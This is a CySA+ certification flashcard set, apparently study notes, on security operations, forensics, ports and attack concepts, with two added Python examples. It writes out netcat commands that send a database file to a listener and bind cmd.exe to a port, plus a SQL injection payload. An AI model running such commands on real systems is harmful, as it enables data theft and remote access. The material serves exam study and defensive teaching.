CySA+
ARP Spoofing/ARP Poisoning
- occurs when an attacker redirects an IP address to a MAC address that was not its intended destination - can cause irregular peer to peer communications - use an IDS to identify the suspicious traffic patterns caused by ARP poisoning generating far more ARP traffic than usual
Google Hacking
- open-source intelligence techniques that use Google search operators to locate vulnerable web servers and applications - use operators such as: quotes, NOT, AND/OR, scope operators (site:, inurl:, intitle:), and URL modifiers
Footprinting *
- phase of an attack or penetration test in which the attacker or tester gathers information about the target before attacking it (targeting multiple machines) - tools that map out the layout of a network, typically in terms of IP address usage, routing topology, and DNS namespace (subdomains and hostnames)
Legitimate processes (Behavior Analysis)
1. System Idle (PID 0) and System (PID 4) 2. Client/Server Runtime Subsystem (csrss.exe) 3. WININIT (wininit.exe) 4. Services (services.exe or svchost.exe) * 5. Local Security Authority Subsystem (lsass.exe) 6. WINLOGON (winlogon.exe) 7. USERINIT (userinit.exe) 8. Explorer (explorer.exe, should be the parent of all processes launched by the user)
Cryptographic Analysis Tools
- tools used to determine the type of encryption algorithm used and assess the strength of the encryption key - an analyst must recover or brute force the user password to obtain the decryption key for an encrypted volume
Best practices to secure network appliances
1. Use ACLs to restrict access to designated host devices 2. monitor the number of designated interfaces 3. deny internet access to remote management
Disadvantages of Agent-based Scanning
1. agents are limited to a particular operating system 2. could be compromised by malware
Detection and Analysis IOCs Sources (technical and non-technical)
1. anti-malware software 2. NIDS/NIPS 3. HIDS/HIPS 4. system logs 5. network device logs 6. SIEM data 7. flow control device 8. internal personnel 9. external personnel 10. cyber-threat intelligence
What might make a process look suspicious?
1. any process name that you do not recognize 2. any process name that is similar to a legitimate system process (ex. scvhost instead of svchost) 3. processes that appear without an icon, version information, description, or company name 4. processes that are unsigned, especially ones claiming to be from a well-known company like Microsoft 5. any process whose digital signature doesn't match the identified publisher 6. any process that does not have a parent/child relationship with a principal Windows process (explorer.exe) 7. any process hosted by Windows utilities like Explorer, Notepad, or Task Manager 8. any process that is packed (compressed), which Process Explorer highlights in purple (while this lesson focused on manual analysis, many UEBA products can automate this process)
5 categories of events in the Windows event logs
1. application (events generated by applications and services) 2. security (audit events like failed log-on or access being denied) 3. system (events generated by the operating system and its services) 4. setup (events generated during the installation of Windows) 5. forwarded events (events that are sent to the local host from other computers)
How do attackers compromise and exploit the controller area network (CAN) bus?
1. attach to the OBD-II port and deliver the exploit locally 2. exploit over the onboard cellular connection (cell modem) 3. exploit over the onboard Wi-Fi
Steps of a XSS attack
1. attacker identifies an input validation vulnerability within a trusted website 2. attacker crafts a URL to perform code injection against the trusted website 3. the trusted site returns a page containing the injected malicious code 4. the malicious code runs in the client's browser with the same permission level as the trusted site
Newer Implementations of Syslog (improvements for drawbacks)
1. can use port 1468 (TCP) for reliable delivery 2. can use TLS to encrypt messages sent to servers 3. can use MD5 and SHA-1 for authentication and integrity 4. can use message filters, automated log analysis, event response scripting, and alternate message formats 5. the newer server implementations are called syslog-ng and rsyslog
How can you mitigate a DDoS Attack?
1. conduct real-time log analysis to identify patterns of suspicious traffic and redirect it to a black hole or sinkhole 2. use geolocation and IP reputation data to redirect or ignore suspicious traffic 3. aggressively close slower connections by reducing timeouts on affected servers 4. use caching and backend infrastructure to offload processing to other servers 5. utilize enterprise DDoS protection services such as Cloudflare or Akamai
How do you mitigate non-standard port usage on your networks?
1. configure firewalls to allow only whitelisted ports to communicate on ingress and egress interfaces 2. configuration documentation should also show which server ports are allowed on any given host type (have good configuration management) 3. configure detection rules to detect mismatched protocol usage over a standard port
How can you detect and mitigate against a pass the hash attack? *
1. detecting these types of attacks is very difficult because the attacker's activity cannot be easily differentiated from legitimate authentication 2. most antivirus and antimalware software will block tools that allow pass the hash attacks (such as Mimikatz) 3. restrict and protect high-privileged domain accounts 4. restrict and protect local accounts with administrative privileges 5. restrict inbound traffic to all workstations using Windows Firewall, except from helpdesk systems, security compliance scanners, and servers
How does an APT use modern malware to operate?
1. dropper or downloader 2. maintain access 3. strengthen access 4. actions on objectives 5. concealment
5 Steps for Conducting Containment (in order)
1. ensure the safety and security of all personnel 2. prevent an ongoing intrusion or data breach 3. identify if the intrusion is the primary or secondary attack 4. avoid alerting the attacker that the attack has been discovered 5. preserve any forensic evidence of the intrusion and attack
4 Key Controls for Mitigating Vulnerabilities in Specialized Systems
1. establish administrative control over operational technology (OT) networks by recruiting staff with relevant expertise 2. implement the minimum network links by disabling unnecessary links, services, and protocols 3. develop and test a patch management program for operational technology (OT) networks 4. perform regular audits of logical and physical access to systems to detect possible vulnerabilities and intrusions (*WARNING: Enumeration tools and vulnerability scanners can cause problems on OT networks*)
3 types of Trend Analysis
1. frequency-based 2. volume-based 3. statistical deviation
Forensic Procedures Four Main Areas:
1. identification 2. collection 3. analysis 4. reporting
What do you do when you find a suspicious process?
1. identify how the process interacts with the Registry and file system 2. determine how the process was launched 3. determine if the process's image file is located in the system folder or a temp folder 4. determine what files are being manipulated by the process 5. determine if the process restores itself upon reboot after deletion 6. determine if a system privilege or service gets blocked if you delete the process 7. determine if the process is interacting with the network (communication with a C2 server)
What might indicate that a piece of malware is running on a port instead of an authorized application?
1. if an unknown open dynamic port (49152-65535) appears to be constantly open on a host, it may indicate a malicious traffic channel 2. non-standard port usage - communicating TCP/IP application traffic, such as HTTP, FTP, or DNS, over a port that is not the well-known or registered port established for that protocol
4 categories of severity inside the Windows event logs
1. information (used for successful events) 2. warning 3. error (significant problems that could result in reduced functionality) 4. audit success/failure
What kind of things can we expect to find when you start analyzing the image from memory?
1. list of running processes at the time of collection 2. password hashes 3. cryptographic keys (which can help you unlock encrypted hard drives that you wouldn't be able to access after you shut down the computer) 4. Registry keys 5. cached files 6. strings from open files
Four Most Common Categories to Perform System Memory Image Acquisition:
1. live acquisition 2. crash dump 3. hibernation file 4. pagefile
3 Different Ways to Perform Disk Image Acquisition
1. live acquisition (capturing the contents of the disk drive while the computer is still running) 2. static acquisition by shutting down 3. static acquisition by pulling the plug
To effectively deploy a SIEM you must consider *
1. log all relevant events and filter irrelevant data 2. establish and document scope of events 3. develop use cases to define a threat 4. plan incident response to an event 5. establish a ticketing process to track events 6. schedule regular threat hunting 7. provide auditors and analysts an evidence trail
Linux File System Analysis Tools
1. lsof 2. df 3. du
Rule options for IDS/IPS logs (Snort)
1. msg 2. flow 3. flags 4. track 5. reference 6. classtype 7. sid and rev
Best practices for configuring egress filters
1. only allow whitelisted application ports and destination addresses to leave your network 2. restrict DNS lookups to trusted and authorized DNS services 3. block access to known bad IP address ranges (blacklist) 4. block all internet access from host subnets that don't use it (ICS/SCADA systems)
4 Main Types of Recovery Actions
1. patching 2. permissions 3. logging 4. system hardening
3 types of Port Security
1. physical port security 2. MAC filtering 3. Network Access Control (NAC)
Digital Forensic Analysts Have Many Different Roles, Including:
1. planning IT systems and processes 2. investigating and reconstructing an incident 3. investigating if crimes occurred 4. collecting and protecting evidence 5. determining if data was exposed (data breach) 6. developing processes and tools 7. supporting ongoing audits
Key Features of a NAC solution
1. posture assessment 2. remediation 3. pre- and post-admission control
Linux Tools for Detecting Malicious Processes
1. pstree 2. ps
Advantages of using Agent-based scanning
1. reduces the impact on the network by reducing the network bandwidth 2. reduces the chance of service outages 3. better for mobile or remote devices when offline
System Hardening Security Checklist
1. remove or disable devices that are not needed or used 2. install OS, application, firmware, and driver patches regularly 3. uninstall all unnecessary network protocols 4. uninstall or disable all unnecessary services and shared folders 5. enforce ACLs on all system resources 6. restrict user accounts to the least privileges needed 7. secure the local admin or root account by renaming it and changing the default password 8. disable unnecessary default user and group accounts 9. verify permissions on system accounts and groups 10. install antimalware software and update its definitions regularly
Windows Tools for Detecting Malicious Processes
1. sfc (System File Checker) - scans all the files on the system to make sure they are protected and haven't been modified 2. Process Monitor 3. Process Explorer 4. tasklist 5. PE Explorer
Symptoms of anomalous activity include
1. strange log entries 2. excessive per-process ports 3. resource consumption 4. unusual user accounts
Different Ways Covert Channels Can Take Advantage
1. transmitting data over a nonstandard port (if egress filtering on the firewall is not enabled) 2. encoding data in TCP/IP packet headers 3. segmenting data across multiple packets 4. obfuscating data using hex encoding 5. transmitting encrypted data
3 Simple Mottos for System Hardening *
1. uninstall anything you aren't using 2. if you need it, patch it frequently 3. always restrict users to least privilege
Unexpected Output (Anomalous Activity)
- unusual request patterns or responses can be indicative of an ongoing or past attack - detect code injection by monitoring the number of database reads or examining HTTP response packet sizes - if an application displays unformatted error messages or strange strings, it could be an indication of application tampering
Netcat (nc)
- utility for reading and writing raw data over a network connection that is often used as a listener for remote shells - can also be used with scripting or redirection to send and receive files
Unexpected Outbound Communication (Anomalous Activity)
- verify any outbound network connections (must understand and approve any connections leaving your network) - unexpected outbound communication could be a sign of a C2 channel or beaconing
Lost System Logs (Virtualization Forensics)
- virtual machines are optimized to spin up when needed and be destroyed when no longer required - *Solution* configure virtual machines to log events to a remote logging server to prevent system logs from being lost during deprovisioning
grep command line tools
-i (ignore case); -v (return non-matching lines); -w (treat search strings as whole words); -c (return a count of matching lines only); -l (return names of files with matching lines); -L (return names of files without matching lines)
dir /Ax
/Ax filters all file/folder types that match the given attribute parameter (x); for example, dir /AH displays only hidden files and folders
dir /Q
/Q displays who owns each file, along with the standard information
dir /R
/R displays alternate data streams for a file
Basic principles for configuring firewall ACLs
1. block incoming requests from internal or private, loopback, and multicast IP address ranges 2. block incoming requests from protocols that should only be used locally (ICMP, DHCP, OSPF, SMB, etc.) 3. configure IPv6 to either block all IPv6 traffic or allow it only to authorized hosts and ports
Order of Volatility (Descending from most volatile to least)
1. CPU registers and cache memory 2. contents of system memory (RAM), routing tables, ARP cache, process table, temporary swap files 3. data on persistent mass storage (HDD/SSD/flash drive) 4. remote logging and monitoring data 5. physical configuration and network topology 6. archival media
5 Different Types of Breaches (descending from most significant to least)
1. Data Exfiltration (an attacker breaks into the system and transfers data to another system) 2. Insider Data Exfiltration (an employee/ex-employee with privileges on the system transfers data to another system) 3. Device Theft/Loss (a device, such as a smartphone or laptop, containing data is lost or stolen) 4. Accidental Data Breach (public disclosure of information or unauthorized transfer caused by human error or misconfiguration) 5. Integrity/Availability Breach (corruption of data or destruction of a system processing data)
Incident Classification Categories
1. Data Integrity (any incident where data is modified or loses integrity) 2. System Process Criticality (incidents that disrupt or threaten a mission essential business function) 3. Downtime (an incident that degrades or interrupts the availability of an asset, system, or business process) 4. Economic (an incident that creates short-term or long-term costs) 5. Data Correlation (an incident that is linked to the TTPs of known adversary groups with extensive capabilities) 6. Reverse Engineering (an incident in which the capabilities of the malware are discovered to be linked to an adversary group) 7. Recovery Time (an incident that requires extensive recovery time due to its scope or severity) 8. Detection Time (an incident that was not discovered quickly)
Defensive Capabilities
1. Detect 2. Destroy 3. Degrade 4. Disrupt 5. Deny 6. Deceive
Forensic Tools Include:
1. EnCase 2. The Forensic Toolkit (FTK) 3. The Sleuth Kit
7 Step Process for Scanning Workflow (Vulnerability Scanning)
1. Install software and patches to establish a baselined system 2. perform an initial scan of the target system 3. analyze the assessment reports based on the baseline 4. perform corrective actions based on reported findings 5. perform another vulnerability scan and assessment 6. document any findings and create reports for relevant stakeholders 7. conduct ongoing scanning to ensure continual remediation (*Scan, Patch, Scan*)
Command and Control servers must issue commands to its zombies in the botnet using various communication channels, these include:
1. Internet Relay Chat (IRC) 2. HTTP and HTTPS 3. Domain Name System (DNS) 4. Social Media Websites 5. Cloud Services 6. Media and Document Files
Common Tools Used by Pentesters
1. Metasploit 2. Cobalt Strike 3. Kali Linux 4. ParrotOS 5. Commando OS
Incident Response Phases (CompTIA model)
1. Preparation 2. Detection & Analysis 3. Containment 4. Eradication & Recovery 5. Post-Incident Activity
How do you set up a listener to receive a file?
1. Set up a listener to receive: nc -l -p 53 > database.sql 2. Send a file to the listener: type database.sql | nc 10.1.0.21 53 (type = print this file to the screen, but by using the pipe we push its output to the netcat listener instead)
How do you set up a regular shell on a victim system?
1. Set up a listener: nc -l -p 443 -e cmd.exe (-l = listen, -p = port, -e = execute) 2. Connect to the listener: nc 10.1.0.1 443 (10.1.0.1 = the IP address I'm trying to connect to)
Common IDS/IPS software
1. Snort 2. Zeek (Bro) 3. Security Onion
Types of SIEM solutions
1. Splunk 2. ELK/Elastic Stack 3. ArcSight 4. QRadar 5. AlienVault and OSSIM 6. Graylog
A nmap discovery scan is used to ...
Footprint the network
What is the key difference between Fingerprinting and Footprinting?
Footprinting is focused on the overall network layout, while Fingerprinting is focused on a single host or server
While a pass the hash attack will work on local workstations, a _______ ticket is needed in an Active Directory environment
Kerberos
Port 445 (UDP)
MICROSOFT-DS (Supports Windows File Sharing)
Port 445 (TCP)
MICROSOFT-DS (supports Windows File Sharing, Server Message Block over TCP/IP, on current Windows networks) (Windows only)
Malware Information Sharing Project (MISP - Indicator Management)
MISP provides a server platform for cyber threat intelligence sharing, a proprietary format, supports OpenIOC definitions, and can import and export STIX over TAXII
Port 1434 (UDP port)
MS-SQL (Microsoft SQL Server) (Windows only)
Port 135 (UDP)
MSRPC (advertises what RPC services are available in a Windows environment)
Port 135 (TCP)
MSRPC (advertises what RPC services are available in a Windows environment) (Windows only)
_____ and _____ help to determine which business functions are critical and to specify appropriate risk countermeasures
MTD, RPO
Deny
Prevent an adversary from learning about your capabilities or accessing your information assets (ex. Firewall ACL, NIPS, Proxy filter, Patch, chroot jail)
FTP Access Logs
a log containing FTP traffic events in a W3C extended log format
Business Continuity Loss
a loss associated with no longer being able to fulfill contracts and orders due to the breakdown of critical systems
Cross-Site Request Forgery (XSRF/CSRF)
a malicious script hosted on the attacker's site that can exploit a session started on another site in the same browser
behavior-based detection
a malware detection method that evaluates an object based on its intended actions before it can actually execute that behavior
Splunk
a market-leading big data information gathering and analysis tool that can import machine-generated data via a connector or visibility add-on
eFUSE
a means for software or firmware to permanently alter the state of a transistor on a computer chip (if the eFUSE is blown that means that firmware is no longer valid or trusted)
Memory Overflow
a means of exploiting a vulnerability in an application to execute arbitrary code or to crash the process (or with an ongoing memory leak to crash the system)
Flow Collector
a means of recording metadata and statistics about network traffic rather than recording each frame
Reimaging
a method of restoring a system that has been sanitized using an image-based backup
Reconstruction
a method of restoring a system that has been sanitized using scripted installation routines and templates
Zero-fill
a method of sanitizing a drive by overwriting all bits on a drive to zero (typically done with hard drives)
Cryptographic Erase (CE)
a method of sanitizing a self-encrypting drive (SSDs) by erasing the media encryption key
Secure Erase (SE)
a method of sanitizing a solid-state device (SSDs) using manufacturer provided software
Secure Disposal
a method of sanitizing that utilizes the physical destruction of the media by mechanical shredding, incineration, or degaussing (used for top secret data or high classification)
Domain Generation Algorithm (DGA)
a method used by malware to evade blacklists by generating domain names for C2 networks dynamically
Fast Flux Network
a method used by malware to hide the presence of C2 networks by continually changing the host IP addresses in domain records, often combined with domain generation algorithms (DGA)
Return on Security Investment (ROSI)
a metric to calculate whether a security control is worth the cost of deploying and maintaining it
Mobile Phone Examiner Plus (MPE+)
a mobile device forensics tool created by AccessData (the developers of FTK)
EnCase Portable (Mobile Device Forensics)
a mobile device forensics tool created by Guidance Software (the developers of EnCase)
Enterprise Mobility Management (EMM)
a mobile device management suite with broader capabilities, such as identity and application management
Yara
a multi-platform program running on Windows, Linux, and Mac OS X for identifying, classifying, and describing malware samples (uses YARA rules)
Demilitarized Zone (DMZ)
a physical or logical subnetwork that contains and exposes an organization's external-facing services to an untrusted, usually larger, network such as the Internet
Downloader
a piece of code that connects to the Internet to retrieve additional tools after the initial infection by a dropper (stage 2)
Connectors or Plug-ins (Data Normalization)
a piece of software designed to provide parsing and normalization functions to a particular SIEM
Probing
a preliminary attack that is used to conduct reconnaissance or enumeration against a web service
Virtual Private Cloud (VPC)
a private network segment made available to a single cloud consumer within a public cloud (consumer is responsible for configuring the IP address space and routing within the cloud) (is typically used to provision internet-accessible applications that need to be accessed from geographically remote sites) (considered an IaaS product)
Continuous Delivery (CI/CD)
a software development method where application and platform requirements are frequently tested and validated for immediate availability (must have continuous integration before this) (focuses on automated testing of code in order to get it ready for release)
Port 1900 (UDP port)
UPnP (Universal Plug and Play is used for auto-configuration of port forwarding by gaming consoles and other smart appliances)
Continuous Deployment (CI/CD)
a software development method where application and platform updates are committed to production rapidly (focuses on automated testing and release of code in order to get it into the production environment more quickly) (takes it a step further than continuous delivery by automatically releasing the code)
Port 5900 (TCP)
VNC (virtual network computing remote access service where security is implementation dependent and VNC may use other ports) (Unix, Linux, MacOS, Windows)
XML Bomb (Billion Laughs Attack)
XML encodes entities that expand to exponential sizes, consuming memory on the host and potentially crashing it (similar to DoS)
Sinkhole
a DoS attack mitigation strategy that directs the traffic that is flooding a target IP address to a different network for analysis
pstree
a Linux command that provides the parent/child relationship of the processes on a given system
Security Content Automation Protocol (SCAP)
a NIST framework that outlines various accepted practices for automating vulnerability scanning by adhering to standards for scanning processes, results reporting and scoring, and vulnerability prioritization (used to uphold internal and external compliance requirements) - 2 main components: OVAL and XCCDF
Sensors (Data Normalization)
a SIEM can collect packet capture and traffic flow data from sniffers and sensors positioned across the network
ArcSight
a SIEM log management and analytics software that can be used for compliance reporting for legislation and regulations like HIPAA, SOX, and PCI DSS
QRadar
a SIEM log management, analytics, and compliance reporting platform created by IBM
sigcheck
a Sysinternals utility that allows you to verify root certificates in the local store against Microsoft's master trust list
Measured Boot
a UEFI feature that gathers secure metrics to validate the boot process in an attestation report
Secure Boot
a UEFI feature that prevents unwanted processes from executing during the boot operation
dd (.dd format)
a Unix/Linux/MacOS command that can perform disk image acquisition (disk duplicator)
certutil
a Windows utility that allows you to display CA configuration information, configure Certificate Services, back up and restore CA components, and verify a certificate's key pair and certificate chain
Windows Firewall
a Windows-based firewall that uses the W3C Extended Log File Format
Daemons
a background service in the Linux operating system that runs as a process with the letter 'd' appended to its name (e.g., httpd, sshd, ftpd)
Mission Essential Function (MEF) *
a business or organizational activity that is too critical to be deferred for anything more than a few hours (if at all)
Playbook
a checklist of actions an analyst performs to detect and respond to a specific type of incident
Attestation
a claim that the data presented in the report is valid by digitally signing it using the TPM's private key
Rootkit
a class of malware that modifies system files (often at the kernel level) to conceal its presence
Security Orchestration, Automation, and Response (SOAR)
a class of security tools that facilitates incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment (SIEM 2.0) (next-gen SIEM, a SIEM with an integrated SOAR) (primarily used for incident response)
unknown unknowns
a classification of malware that contains completely new attack vectors and exploits
known unknowns
a classification of malware that contains obfuscation techniques to circumvent signature-matching and detection
Function as a Service (FAAS)
a cloud service model that supports serverless software architecture by provisioning runtime containers in which code is executed in a particular programming language (essentially it allows us to run things and create applications without having our own servers)
Qualys
a cloud-based vulnerability management solution that installs sensor agents at various points in the customer's network; the sensors upload data to the cloud platform for analysis
DevSecOps
a combination of software development, security operations, and system operations by integrating each discipline with the others (utilizes a shift-left mindset, which means security is developed earlier in the lifecycle)
grep (commands that rely on regex) *
a command on Unix/Linux/macOS systems that invokes simple string matching or regex syntax to search text files for specific strings (use grep to search the contents if analyzing the contents on Linux)
sort (commands that rely on regex)
a command that can be used to change the output order
cut (commands that rely on regex)
a command that enables the user to specify which text on a line they want removed from the results
head (commands that rely on regex)
a command that outputs the first 10 lines of a specified file
tail (commands that rely on regex)
a command that outputs the last 10 lines of a specified file (this command is very useful when dealing with logs)
Reaver (Wireless Assessment Tools)
a command-line tool used to perform brute force attacks against WPS-enabled access points
Nessus
a commercial vulnerability scanner produced by Tenable Network Security for on-premises and cloud-based vulnerability scanning
Enterprise Service Bus (ESB)
a common component of SOA architecture that facilitates decoupled service-to-service communication
SysAdmin, Network, and Security (SANS) institute
a company specializing in cybersecurity and secure web application development training that sponsors the GIAC certification
Machine Learning (ML)
a component of AI that enables a machine to develop strategies for solving a task given a labeled dataset where features have been manually identified but without further explicit instructions (is only as good as the datasets used to train it) (assists with data correlation)
Full/Deep Assessment Scan
a comprehensive scan that forces the use of more plug-in types, takes longer to conduct host scanning, and has more risk of causing a service disruption
Embedded Systems
a computer system that is designed to perform a specific, dedicated function
Blinding Attack
a condition that occurs when a firewall is under-resourced and cannot log data fast enough, therefore some data is missed
Cross Origin Resource Sharing (CORS) Policy
a content delivery network policy that instructs the browser to treat requests from nominated domains as safe (*WARNING: weak CORS policies expose the site to vulnerabilities like XSS*)
Service Level Agreement (SLA)
a contractual agreement setting out the detailed terms under which an ongoing service is provided
tcpdump
a data-network packet analyzer computer program that runs under a command line interface and allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached
Exception Management
a defined process to closely monitor systems that cannot be patched or remediated and must be excepted from scans
OAuth (Open Authorization)
a delegated authorization framework for RESTful APIs that enables apps to obtain limited access (scopes) to a user's data without giving away a user's password (OAuth2 is explicitly designed to authorize claims and not authenticate users) (must be paired with another tool to perform authentication, typically uses OIDC for authentication) (*OAuth2 is vulnerable to CSRF attacks and open redirects*)
Forensic Watermark
a digital watermark that can defeat attempts at removal by cropping pages or images in the file
Self-Encrypting Drives
a disk drive where the controller can automatically encrypt data that is written to it (uses firmware to run the encryption process and all of this is done at the hardware level)
Fuzzing
a dynamic code analysis technique that involves sending a running application random and unusual input to evaluate how the application responds (is a technique designed to test software for bugs and vulnerabilities)
Debugger
a dynamic testing tool used to analyze software as it executes (allows us to pause execution and to monitor/adjust the value of variables at different stages)
Hibernation File (System Memory Image Acquisition)
a file that is written to the disk when the workstation is put into a sleep state (drawback is some malware can detect the use of a sleep state and perform anti-forensics)
Prefetch Files *
a file that records the names of applications that have been run, as well as the date and time, file path, run count, and DLLs used by the executable
pagefile/swap file (System Memory Image Acquisition)
a file that stores pages of memory in use that exceed the capacity of the host's physical RAM modules (is not structured in a way that analysis tools can interpret but can be used to search for strings)
Pretext
a form of social engineering in which an individual lies and provides a false motive to obtain privileged data
Narrative-based Threat Awareness and Intelligence
a form of trend analysis that is reported in long-form prose to describe a common attack vector seen over time
OpenIOC (Indicator Management)
a framework by Mandiant that uses XML-formatted files for supplying codified information to automate incident detection and analysis
Diamond Model of Intrusion Analysis (Attack Framework)
a framework for analyzing cybersecurity incidents and intrusions by exploring the relationships between four core features: adversary, capability, infrastructure, and victim
Domain-Based Message Authentication, Reporting, and Conformance (DMARC)
a framework for ensuring proper application of SPF and DKIM utilizing a policy published as a DNS record (can use either SPF or DKIM or both)
Wireshark
a free and open-source GUI-based packet analyzer that is used for network troubleshooting, analysis, software and communications protocol development, and education
Statistical/Lexicon (DLP Discovery and Classification)
a further refinement of partial document matching is to use machine learning to analyze a range of data sources
Internet Relay Chat (IRC)
a group communication protocol with networks divided into discrete channels that are the individual forums used by clients to chat
Regular Expression (regex)
a group of characters that describe how to execute a specific search pattern on a given text
Internet of Things (IoT)
a group of objects (electronic or not) that are connected to the wider Internet by using embedded electronic components
Jumpbox
a hardened server that provides access to other hosts within the DMZ (allows secure communication from the internal network to hosts within the DMZ) (typically configure VMs as Jumpboxes)
Vulnerability Scanner
a hardware appliance or software application that is configured with a list of known weaknesses and exploits and can scan for their presence in a host operating system or within a particular application
Registry
a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for the kernel, device drivers, services, Security Accounts Manager, and the user interface
Virtualization
a host computer is installed with a hypervisor that can be used to install and manage multiple guest operating systems or VMs
Digital Forensics Kit
a kit containing the software and hardware tools required to acquire and analyze evidence from system memory dumps and mass storage file systems
MITRE ATT&CK Framework (Attack Framework)
a knowledge base maintained by the MITRE Corporation for listing and explaining specific adversary tactics, techniques, and common knowledge or procedures
Due Diligence
a legal principle that a subject has used best practice or reasonable care when setting up, configuring, and maintaining a system
iptables
a linux-based firewall that uses the syslog file format for its logs
Access Control Lists (ACL)
a list of IP addresses and ports that are allowed or denied access to the network segment or zone
Script
a list of commands that are executed by a certain program or scripting engine (Bash, PowerShell, Python, Ruby, AWK)
Access Control List (ACLs)
a list of permitted and denied network connections based on either IP addresses, ports, or applications in use
Continuous Integration (CI/CD)
a software development method where code updates are tested and committed to a development or build server/code repository rapidly (can test and commit updates multiple times per day) (detects and resolves development conflicts early and often)
Agile Method
a software development model that focuses on iterative and incremental development to account for evolving requirements and expectations
Waterfall Method
a software development model where the phases of the SDLC cascade so that each phase will start only when all tasks identified in the previous phase are complete (traditional method)
Stress Test
a software testing method that evaluates how software performs under extreme load (is used to determine what could trigger a DoS)
Dereferencing
reading or writing the object that a pointer refers to; the vulnerability (a null pointer dereference) occurs when code dereferences a pointer that is null or no longer valid, which typically crashes the program (DoS) and can sometimes be exploited further
Race Conditions
a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer (can be used against databases, file systems, operating system, kernel, or memory)
802.1X
a standard for encapsulating EAP (Extensible Authentication Protocol) communications over a LAN or wireless LAN and that provides port-based authentication
Malware Attribute Enumeration and Characterization (MAEC) Scheme
a standardized language for sharing structured information about malware that is complementary to STIX and TAXII to improve the automated sharing of threat intelligence
SIEM Correlation Rule
a statement that matches certain conditions as expressed using logical expressions, such as AND and OR, and operators, such as == (matches), < (less than), > (greater than), and in (contains)
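The rule above, as an added example that is not part of the original notes: a minimal correlation evaluator that supports AND/OR trees with the ==, <, > and in operators, plus one stateful correlation (several failed logins followed by a success from the same source). The event field names, sample events and thresholds are constructed for illustration.

```python
"""Added example, not from the original notes: a minimal SIEM-style
correlation rule evaluator. Field names, sample events and the rule
thresholds are constructed for illustration."""
from collections import defaultdict

# Constructed, already-normalized events (one dict per log record)
EVENTS = [
    {"ts": 0,  "src": "10.0.0.5", "user": "alice", "action": "login", "result": "fail"},
    {"ts": 5,  "src": "10.0.0.5", "user": "alice", "action": "login", "result": "fail"},
    {"ts": 9,  "src": "10.0.0.5", "user": "alice", "action": "login", "result": "fail"},
    {"ts": 12, "src": "10.0.0.5", "user": "alice", "action": "login", "result": "success"},
    {"ts": 20, "src": "10.0.0.7", "user": "bob",   "action": "login", "result": "fail"},
    {"ts": 30, "src": "10.0.0.5", "user": "alice", "action": "download", "bytes": 5_000_000},
]

# The operators named in the definition: == (matches), < , >, in (contains)
OPERATORS = {
    "==": lambda a, b: a == b,
    "<": lambda a, b: a < b,
    ">": lambda a, b: a > b,
    "in": lambda a, b: b in str(a),
}

def match(cond, event):
    """Evaluate a condition tree against one event.
    Leaves are (field, op, value); nodes are ("AND"|"OR", [subconditions]).
    A field missing from the event never matches."""
    if cond[0] in ("AND", "OR"):
        results = (match(c, event) for c in cond[1])
        return all(results) if cond[0] == "AND" else any(results)
    field, op, value = cond
    if field not in event:
        return False
    return OPERATORS[op](event[field], value)

FAILED_LOGIN = ("AND", [("action", "==", "login"), ("result", "==", "fail")])
SUCCESS_LOGIN = ("AND", [("action", "==", "login"), ("result", "==", "success")])

def brute_force_then_success(events, threshold=3, window=60):
    """Stateful correlation: at least `threshold` failed logins from one source
    within `window` seconds, followed by a successful login from that source.
    Returns (source, user, failure_count) tuples for each alert raised."""
    fails = defaultdict(list)   # src -> timestamps of failed logins
    alerts = []
    for ev in events:
        if match(FAILED_LOGIN, ev):
            fails[ev["src"]].append(ev["ts"])
        elif match(SUCCESS_LOGIN, ev):
            recent = [t for t in fails[ev["src"]] if ev["ts"] - t <= window]
            if len(recent) >= threshold:
                alerts.append((ev["src"], ev["user"], len(recent)))
    return alerts
```

Single-event rules (the `match` tree) are what most SIEM rule languages express directly; the stateful part is where the real value is, because a lone failed login is noise and the sequence is the incident.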
Normalization (Secure Coding)
a string is stripped of illegal characters or substrings and converted to the accepted character set
Exact Data Match (EDM) (DLP Discovery and Classification)
a structured database of string values to match
Port-based NAC
a switch (or router) that performs some sort of authentication of the attached device before activating the port
Vulnerability Feed
a synchronized list of data and scripts used to check for vulnerabilities, also known as plug-ins or network vulnerability tests (NVTs) (similar to antivirus signatures)
Business Impact Analysis (BIA)
a systematic activity that identifies organizational risks and determines their effect on ongoing, mission critical operations
cron
a task scheduler in Linux that runs commands at scheduled times from crontab entries (including @reboot entries that run at startup), which makes its tables a common persistence location to review
Parameterized Queries
a technique that defends against SQL injection (and, combined with authorization checks, insecure object references) by using placeholders in a SQL query and binding user input separately, so the input is treated as data and never parsed as SQL (this is input handling, distinct from output encoding)
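As an added example (not from the original notes), the vulnerable string-built query beside its parameterized form, using Python's built-in sqlite3 module against an in-memory table. The table, accounts and the injection string are constructed for illustration.

```python
"""Added example, not from the original notes: SQL injection against a
string-built query versus the same query with bound parameters.
The table and sample rows are constructed."""
import sqlite3

def build_db():
    """Constructed in-memory database with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return conn

def login_vulnerable(conn, name, password):
    """Input is concatenated into the statement, so it is parsed as SQL."""
    query = f"SELECT id FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(query).fetchall()

def login_parameterized(conn, name, password):
    """Placeholders (?) keep the statement fixed; values are bound as data."""
    query = "SELECT id FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchall()

# Classic tautology payload: closes the string literal and adds OR '1'='1'
INJECTION = "x' OR '1'='1"
```

With the injected password the vulnerable query becomes `... AND password = 'x' OR '1'='1'`, which is true for every row, so it returns all user IDs; the parameterized version compares the literal string and returns nothing.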
Address Space Layout Randomization (ASLR)
a technique that randomizes where components in a running application are placed in memory to protect against buffer overflows
Fast Flux DNS
a technique that rapidly changes the IP addresses associated with a domain (can be detected by looking at communication patterns in the proxy logs)
nmap -f or --mtu (Fragmentation)
a technique that splits the TCP header of each probe between multiple IP datagrams to make it harder for an IDS or IPS to detect
Policy Template (DLP Discovery and Classification)
a template contains dictionaries optimized for data points in a regulatory or legislative schema (specialized dictionary)
Buffer
a temporary storage area that a program uses to store data
JSON Web Tokens (JWT)
